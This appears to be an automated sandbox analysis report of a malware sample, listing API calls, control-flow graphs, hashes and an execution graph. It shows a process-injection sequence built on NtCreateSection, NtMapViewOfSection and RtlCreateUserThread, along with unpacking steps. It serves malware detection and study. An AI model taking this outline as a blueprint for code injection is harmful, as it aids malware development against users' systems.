                                                                                                                    • Instruction Fuzzy Hash: 6AE04F30505A098FEF28AFA8C0DCBB032A5EB18256F1401BADC0EDD295CB764945C724
                                                                                                                    Function 0299400C Relevance: 1.9, APIs: 1, Instructions: 447COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e4a96c0002796f4483eb6bc6feb746ec78d293e7f1134298137c4194076fbbcd
                                                                                                                    • Instruction ID: 8454c1eaa0fa940ca990caeb2c1ba2378f54329218fdaabf3f41a054468833e9
                                                                                                                    • Opcode Fuzzy Hash: e4a96c0002796f4483eb6bc6feb746ec78d293e7f1134298137c4194076fbbcd
                                                                                                                    • Instruction Fuzzy Hash: 19D17E30718B098BDF65EF6C94467AEB7E6FB98711F10452EE44AD3241DF74E8428B82
                                                                                                                    Function 08581F94 Relevance: 1.7, APIs: 1, Instructions: 172fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
                                                                                                                    • Instruction ID: a1c683ce3b278adf1e69514ddda66e4030ecdef3b1c1efa143a7d4506311b6a4
                                                                                                                    • Opcode Fuzzy Hash: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
                                                                                                                    • Instruction Fuzzy Hash: E0413930718A4D8FDBA8BFAC945836E76D2FBC8212F14457EA80ED3385DE749D068785
                                                                                                                    Function 0858337C Relevance: 1.7, APIs: 1, Instructions: 157fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                                    • Instruction ID: ed35abaa17558035c0e75123278e37d883c4dc9c7372b06e796ad6d8cc25f435
                                                                                                                    • Opcode Fuzzy Hash: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                                    • Instruction Fuzzy Hash: 8D41B23471CB0D8FD758BB6C94593BAB6C2FBC8612F14022EA89BD3355EE64980243C2
                                                                                                                    Function 0299337C Relevance: 1.7, APIs: 1, Instructions: 157fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                                    • Instruction ID: b99120e54768543fa6ab25e6d38b9b32ead36e264b8bac80dc6af71364ab55d3
                                                                                                                    • Opcode Fuzzy Hash: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                                    • Instruction Fuzzy Hash: E941EE3031CF0D4FDB59AA2C98593BEB2D6EBC9321F55026EA89FC3240DE64980347C6
                                                                                                                    Function 08584D20 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetVolumeInformationA.KERNEL32 ref: 08584D8D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationVolume
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2039140958-0
                                                                                                                    • Opcode ID: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                                    • Instruction ID: b5d83f16a419a5516db6def047a2f47a0f22bbcdea869c37580e460e9e402f05
                                                                                                                    • Opcode Fuzzy Hash: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                                    • Instruction Fuzzy Hash: 0A312131618A4C8FDB64FF68C448BAA77E1FBD8311F10466E984ED7264EE70D945CB82
                                                                                                                    Function 02994D20 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetVolumeInformationA.KERNEL32 ref: 02994D8D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationVolume
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2039140958-0
                                                                                                                    • Opcode ID: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                                    • Instruction ID: bc9fe309621fa8cc02b86886469c61753f036044b33da74c0f41e3ad43a4ea53
                                                                                                                    • Opcode Fuzzy Hash: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                                    • Instruction Fuzzy Hash: DF316530618A4C8FDB64EF68C449BAA77E2FBD8311F10466E984EC7264DE70D945CB82
                                                                                                                    Function 08581A10 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 08581A60: RtlCreateHeap.NTDLL ref: 08581B77
                                                                                                                    • SleepEx.KERNEL32(?,?,?,?,?,?,?,08581A03), ref: 08581A30
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHeapSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 221814145-0
                                                                                                                    • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                    • Instruction ID: 14b8d86e69eed2fde64ac6a308d2f19e9c80488acac673b88b1e385378acb21b
                                                                                                                    • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                    • Instruction Fuzzy Hash: 12E04F24754E09CBDB98BBB8D4C432C7591FBC8252F90197FA91EDB285E824C9838391
                                                                                                                    Function 02991A10 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02991A60: RtlCreateHeap.NTDLL ref: 02991B77
                                                                                                                    • SleepEx.KERNEL32(?,?,?,?,?,?,?,02991A03), ref: 02991A30
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHeapSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 221814145-0
                                                                                                                    • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                    • Instruction ID: 9ef4ba2ec605f4677f4192b03451c5bc4481b0c3e8e3bf685c0f3c256c3ac0b5
                                                                                                                    • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                    • Instruction Fuzzy Hash: 3AE04F30718A0A5BDF98BBBC94C432C6195FBC8370F901979691ECA285E924CD858731

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:8.6%
                                                                                                                    Dynamic/Decrypted Code Coverage:19.9%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:156
                                                                                                                    Total number of Limit Nodes:6
                                                                                                                    execution_graph 4181 6a092b GetPEB 4182 6a0972 4181->4182 4016 840146 4017 84014a 4016->4017 4019 840156 4016->4019 4020 840157 4017->4020 4021 840166 4020->4021 4024 8408f7 4021->4024 4025 840912 4024->4025 4026 84091b CreateToolhelp32Snapshot 4025->4026 4027 840937 Module32First 4025->4027 4026->4025 4026->4027 4028 840946 4027->4028 4029 84016f 4027->4029 4031 8405b6 4028->4031 4029->4019 4032 8405e1 4031->4032 4033 8405f2 VirtualAlloc 4032->4033 4034 84062a 4032->4034 4033->4034 4034->4034 4087 402e42 4088 402e47 4087->4088 4089 402f18 4088->4089 4091 4020ea NtQuerySystemInformation 4088->4091 4092 402f4c 4088->4092 4090 401902 8 API calls 4089->4090 4089->4092 4090->4092 4091->4089 4246 418986 4247 418990 4246->4247 4248 418940 SetPriorityClass 4247->4248 4249 4189ad 4247->4249 4248->4247 4195 40190e 4196 401912 4195->4196 4198 4018b5 4195->4198 4197 401946 Sleep 4196->4197 4199 401961 4197->4199 4200 401529 7 API calls 4199->4200 4201 401972 4199->4201 4200->4201 3960 418ed0 3963 418a70 3960->3963 3962 418ed5 3964 418a7d 3963->3964 3965 418b80 7 API calls 3964->3965 3966 418cc6 3964->3966 3968 418bf8 7 API calls 3965->3968 3967 418cd4 SetCommState 3966->3967 3971 418ced 3966->3971 3967->3966 3969 418ca4 3968->3969 3970 418c98 ObjectPrivilegeAuditAlarmW 3968->3970 3972 418cb5 3969->3972 3973 418cad WaitForSingleObject 3969->3973 3970->3969 3974 418daa 3971->3974 3975 418cfa 9 API calls 3971->3975 3972->3966 3973->3972 3987 418740 LocalAlloc 3974->3987 3982 418d88 3975->3982 3979 418daf LoadLibraryA 3988 418770 GetModuleHandleW GetProcAddress VirtualProtect 3979->3988 3980 418dfd 3989 4189d0 3980->3989 3982->3974 3983 418e02 3984 418e43 InterlockedCompareExchange 3983->3984 3985 418e23 MoveFileW 3983->3985 3986 418e5d 3983->3986 3984->3983 3985->3983 3986->3962 3987->3979 3988->3980 3990 4189f9 QueryDosDeviceW 3989->3990 3991 418a0a 3989->3991 3990->3991 4000 418910 3991->4000 3994 418a25 4003 418950 3994->4003 3995 418a1d FreeEnvironmentStringsA 3995->3994 3998 418a57 3998->3983 3999 418a3c HeapCreate GetNumaProcessorNode 3999->3998 4001 418921 FatalAppExitA GetModuleHandleA 4000->4001 4002 418933 4000->4002 4001->4002 4002->3994 4002->3995 4004 41896c 4003->4004 4005 41895e BuildCommDCBA 4003->4005 4006 418974 FreeEnvironmentStringsA 4004->4006 4009 41897c 4004->4009 4005->4009 4006->4009 4007 4189ad 4007->3998 4007->3999 4009->4007 4010 418940 4009->4010 4013 4188c0 4010->4013 4014 4188eb 4013->4014 4015 4188dc SetPriorityClass 4013->4015 4014->4009 4015->4014 4035 6a003c 4036 6a0049 4035->4036 4048 6a0e0f SetErrorMode SetErrorMode 4036->4048 4041 6a0265 4042 6a02ce VirtualProtect 4041->4042 4044 6a030b 4042->4044 4043 6a0439 VirtualFree 4047 6a04be LoadLibraryA 4043->4047 4044->4043 4046 6a08c7 4047->4046 4049 6a0223 4048->4049 4050 6a0d90 4049->4050 4051 6a0dad 4050->4051 4052 6a0dbb GetPEB 4051->4052 4053 6a0238 VirtualAlloc 4051->4053 4052->4053 4053->4041 4099 4014db 4100 401469 4099->4100 4101 40148f 4099->4101 4101->4099 4101->4100 4102 4015d5 NtDuplicateObject 4101->4102 4102->4100 4103 4015f2 NtCreateSection 4102->4103 4104 401672 NtCreateSection 4103->4104 4105 401618 NtMapViewOfSection 4103->4105 4104->4100 4107 40169e 4104->4107 4105->4104 4106 40163b NtMapViewOfSection 4105->4106 4106->4104 4110 401659 4106->4110 4107->4100 4108 4016a8 NtMapViewOfSection 4107->4108 4108->4100 4109 4016cf NtMapViewOfSection 4108->4109 4109->4100 4110->4104 4206 401922 4207 401930 4206->4207 4208 401946 Sleep 4207->4208 4209 401961 4208->4209 4210 401529 7 API calls 4209->4210 4211 401972 4209->4211 4210->4211 4228 401534 4229 401546 4228->4229 4230 4015d5 NtDuplicateObject 4229->4230 4238 4016f1 4229->4238 4231 4015f2 NtCreateSection 4230->4231 4230->4238 4232 401672 NtCreateSection 4231->4232 4233 401618 NtMapViewOfSection 4231->4233 4235 40169e 4232->4235 4232->4238 4233->4232 4234 40163b NtMapViewOfSection 4233->4234 4234->4232 4236 401659 4234->4236 4237 4016a8 NtMapViewOfSection 4235->4237 4235->4238 4236->4232 4237->4238 4239 4016cf NtMapViewOfSection 4237->4239 4239->4238 4054 402ffa 4055 40313d 4054->4055 4056 403024 4054->4056 4056->4055 4057 4030df RtlCreateUserThread NtTerminateProcess 4056->4057 4057->4055 4058 402ebc 4061 402eb4 4058->4061 4059 402f18 4063 402f4c 4059->4063 4069 401902 4059->4069 4061->4059 4061->4063 4064 4020ea 4061->4064 4065 4020fb 4064->4065 4066 40214e 4065->4066 4067 402152 NtQuerySystemInformation 4065->4067 4068 40216e 4065->4068 4066->4065 4066->4067 4067->4066 4068->4059 4070 401913 4069->4070 4071 401946 Sleep 4070->4071 4072 401961 4071->4072 4074 401972 4072->4074 4075 401529 4072->4075 4074->4063 4076 401539 4075->4076 4077 4015d5 NtDuplicateObject 4076->4077 4085 4016f1 4076->4085 4078 4015f2 NtCreateSection 4077->4078 4077->4085 4079 401672 NtCreateSection 4078->4079 4080 401618 NtMapViewOfSection 4078->4080 4082 40169e 4079->4082 4079->4085 4080->4079 4081 40163b NtMapViewOfSection 4080->4081 4081->4079 4083 401659 4081->4083 4084 4016a8 NtMapViewOfSection 4082->4084 4082->4085 4083->4079 4084->4085 4086 4016cf NtMapViewOfSection 4084->4086 4085->4074 4086->4085 4111 4020fc 4112 402107 4111->4112 4113 402152 NtQuerySystemInformation 4112->4113 4114 40216e 4112->4114 4113->4112

                                                                                                                    Executed Functions

                                                                                                                    Function 00418A70 Relevance: 54.6, APIs: 29, Strings: 2, Instructions: 321filewindowlibraryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 418a70-418a98 2 418aa0-418aa7 0->2 3 418ad4-418ada 2->3 4 418aa9-418ad0 2->4 5 418adc-418ae8 3->5 6 418aee-418af8 3->6 4->3 5->6 7 418b33-418b3a 6->7 8 418afa-418b29 6->8 7->2 9 418b40-418b46 7->9 8->7 11 418b48-418b4e 9->11 12 418b50-418b56 11->12 13 418b5c-418b66 11->13 12->13 14 418b68 13->14 15 418b6a-418b71 13->15 14->15 15->11 16 418b73-418b7a 15->16 17 418b80-418c96 InterlockedCompareExchange GetFocus ReadConsoleA FindAtomA SearchPathA SetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExW CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 16->17 18 418cc6-418cd2 16->18 22 418ca4-418cab 17->22 23 418c98-418c9e ObjectPrivilegeAuditAlarmW 17->23 19 418cd4-418ce2 SetCommState 18->19 24 418ce4-418ceb 19->24 25 418ced-418cf4 19->25 26 418cb5-418cc3 22->26 27 418cad-418caf WaitForSingleObject 22->27 23->22 24->19 24->25 28 418daa-418db9 call 418740 25->28 29 418cfa-418da4 GetConsoleAliasesLengthW GetComputerNameA CopyFileW GetFileAttributesA GetConsoleAliasExesLengthW GetBinaryType FormatMessageA GetLongPathNameA PurgeComm 25->29 26->18 27->26 34 418dbb-418dcc 28->34 35 418ded-418df8 LoadLibraryA call 418770 28->35 29->28 37 418dd0-418de0 34->37 42 418dfd-418e0e call 4189d0 35->42 40 418de2 37->40 41 418de8-418deb 37->41 40->41 41->35 41->37 46 418e10-418e17 42->46 48 418e19-418e27 MoveFileW 46->48 49 418e2d-418e33 46->49 48->49 50 418e35 call 418760 49->50 51 418e3a-418e41 49->51 50->51 54 418e43-418e4e InterlockedCompareExchange 51->54 55 418e54-418e5b 51->55 54->55 55->46 57 418e5d-418e6d 55->57 59 418e70-418e80 57->59 60 418e82 59->60 61 418e89-418e8c 59->61 60->61 61->59 62 418e8e-418e99 61->62 63 418ea0-418ea5 62->63 64 418ea7-418ead 63->64 65 418eaf-418eb5 63->65 64->65 66 418eb7-418ec4 64->66 65->63 65->66
                                                                                                                    APIs
                                                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418B8B
                                                                                                                    • GetFocus.USER32 ref: 00418B91
                                                                                                                    • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418B9E
                                                                                                                    • FindAtomA.KERNEL32(00000000), ref: 00418BA5
                                                                                                                    • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BBD
                                                                                                                    • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00418BC5
                                                                                                                    • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BDD
                                                                                                                    • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418C04
                                                                                                                    • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C10
                                                                                                                    • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418C26
                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00418C2C
                                                                                                                    • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418C71
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00418C80
                                                                                                                    • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418C89
                                                                                                                    • ObjectPrivilegeAuditAlarmW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C9E
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418CAF
                                                                                                                    • SetCommState.KERNELBASE(00000000,00000000), ref: 00418CD8
                                                                                                                    • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00418D09
                                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00418D1D
                                                                                                                    • CopyFileW.KERNEL32(0041A3AC,0041A380,00000000), ref: 00418D2E
                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418D35
                                                                                                                    • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418D3B
                                                                                                                    • GetBinaryType.KERNEL32(0041A3C8,?), ref: 00418D4D
                                                                                                                    • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00418D60
                                                                                                                    • GetLongPathNameA.KERNEL32(0041A3E4,?,00000000), ref: 00418D73
                                                                                                                    • PurgeComm.KERNEL32(00000000,00000000), ref: 00418D7B
                                                                                                                    • LoadLibraryA.KERNELBASE(0041A3EC), ref: 00418DF2
                                                                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00418E27
                                                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418E4E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849711788.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_40b000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleFile$CommNamePath$CompareCopyExchangeInterlockedLengthObjectSearch$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryComputerConfigCreateDefaultEnvironmentExesFindFocusFormatLibraryLoadLongMessageModeModuleMoveOutputPipePrivilegePurgeReadSingleStateStringsSystemTimeTypeWaitWrite
                                                                                                                    • String ID: k`$}$
                                                                                                                    • API String ID: 2220722107-956986773
                                                                                                                    • Opcode ID: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                                                                                                                    • Instruction ID: 0c0e40555d578e92a9f225f047ccd42c64e3c90cdaccad76b264c498dc6ec0a1
                                                                                                                    • Opcode Fuzzy Hash: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                                                                                                                    • Instruction Fuzzy Hash: 9FB1A0B1901224ABCB219B65EC58EDF7B78EF49350F00816EF649A3150DB785EC4CFA9
                                                                                                                    Function 004014DB Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 243nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 68 4014db-4014e7 69 401486-40148b 68->69 70 4014e9 68->70 71 401550-401569 70->71 72 4014eb 70->72 78 40155d-40156c call 4011a4 71->78 73 40155a 72->73 74 4014ed-4014fb 72->74 73->78 79 40149a-4014a8 74->79 80 4014fd-4014ff 74->80 84 40156e-40157f 78->84 89 4014c1-4014c8 79->89 83 401501 80->83 80->84 87 401504-401518 83->87 88 40148f 83->88 85 401581 84->85 86 401584-401589 84->86 85->86 97 4018a6-4018ae 86->97 98 40158f-4015a0 86->98 87->89 90 40151a 87->90 88->79 91 401469-401485 call 4011a4 89->91 92 4014ca 89->92 94 401539-401555 90->94 95 40151c-401526 90->95 91->69 92->68 94->71 97->86 106 4018a4-4018b3 98->106 107 4015a6-4015cf 98->107 109 4018c8 106->109 110 4018b9-4018c4 106->110 107->106 116 4015d5-4015ec NtDuplicateObject 107->116 109->110 112 4018cb-4018ff call 4011a4 109->112 110->112 116->106 117 4015f2-401616 NtCreateSection 116->117 119 401672-401698 NtCreateSection 117->119 120 401618-401639 NtMapViewOfSection 117->120 119->106 123 40169e-4016a2 119->123 120->119 122 40163b-401657 NtMapViewOfSection 120->122 122->119 125 401659-40166f 122->125 123->106 126 4016a8-4016c9 NtMapViewOfSection 123->126 125->119 126->106 128 4016cf-4016eb NtMapViewOfSection 126->128 128->106 131 4016f1 call 4016f6 128->131
                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$CreateDuplicateObjectView
                                                                                                                    • String ID: 1
                                                                                                                    • API String ID: 1652636561-2212294583
                                                                                                                    • Opcode ID: a3d0a89ba2f0946d3c73b933561f00ce793550d5be3e53aacc3d784ec313288b
                                                                                                                    • Instruction ID: 7f4d7c4657737381e02ab4131f106e217a3bc84f51a1891dc43a423f49ad99c1
                                                                                                                    • Opcode Fuzzy Hash: a3d0a89ba2f0946d3c73b933561f00ce793550d5be3e53aacc3d784ec313288b
                                                                                                                    • Instruction Fuzzy Hash: 14718D71A00205FFEB209F91CC49FEF7BB8EF85B10F14412AF912BA2E5D6759905CA58
                                                                                                                    Function 00401529 Relevance: 10.7, APIs: 7, Instructions: 208nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 219 401529-401532 220 401543 219->220 221 401539-40153f 219->221 220->221 222 401546-40157f call 4011a4 220->222 221->222 232 401581 222->232 233 401584-401589 222->233 232->233 235 4018a6-4018ae 233->235 236 40158f-4015a0 233->236 235->233 239 4018a4-4018b3 236->239 240 4015a6-4015cf 236->240 242 4018c8 239->242 243 4018b9-4018c4 239->243 240->239 249 4015d5-4015ec NtDuplicateObject 240->249 242->243 245 4018cb-4018ff call 4011a4 242->245 243->245 249->239 250 4015f2-401616 NtCreateSection 249->250 252 401672-401698 NtCreateSection 250->252 253 401618-401639 NtMapViewOfSection 250->253 252->239 256 40169e-4016a2 252->256 253->252 255 40163b-401657 NtMapViewOfSection 253->255 255->252 258 401659-40166f 255->258 256->239 259 4016a8-4016c9 NtMapViewOfSection 256->259 258->252 259->239 261 4016cf-4016eb NtMapViewOfSection 259->261 261->239 264 4016f1 call 4016f6 261->264
                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1546783058-0
                                                                                                                    • Opcode ID: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                                                    • Instruction ID: 138ec7ca1e8744eb65f40bd9736a53a73cefe8eecd72c79945fcbf62a21b6401
                                                                                                                    • Opcode Fuzzy Hash: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
                                                                                                                    • Instruction Fuzzy Hash: D9616E71900205FBEB209F95DC49FEB7BB8FF81B00F14412AFA12BA1E4D6749A05DB65
                                                                                                                    Function 00401534 Relevance: 10.7, APIs: 7, Instructions: 177nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 267 401534-40157f call 4011a4 278 401581 267->278 279 401584-401589 267->279 278->279 281 4018a6-4018ae 279->281 282 40158f-4015a0 279->282 281->279 285 4018a4-4018b3 282->285 286 4015a6-4015cf 282->286 288 4018c8 285->288 289 4018b9-4018c4 285->289 286->285 295 4015d5-4015ec NtDuplicateObject 286->295 288->289 291 4018cb-4018ff call 4011a4 288->291 289->291 295->285 296 4015f2-401616 NtCreateSection 295->296 298 401672-401698 NtCreateSection 296->298 299 401618-401639 NtMapViewOfSection 296->299 298->285 302 40169e-4016a2 298->302 299->298 301 40163b-401657 NtMapViewOfSection 299->301 301->298 304 401659-40166f 301->304 302->285 305 4016a8-4016c9 NtMapViewOfSection 302->305 304->298 305->285 307 4016cf-4016eb NtMapViewOfSection 305->307 307->285 310 4016f1 call 4016f6 307->310
                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
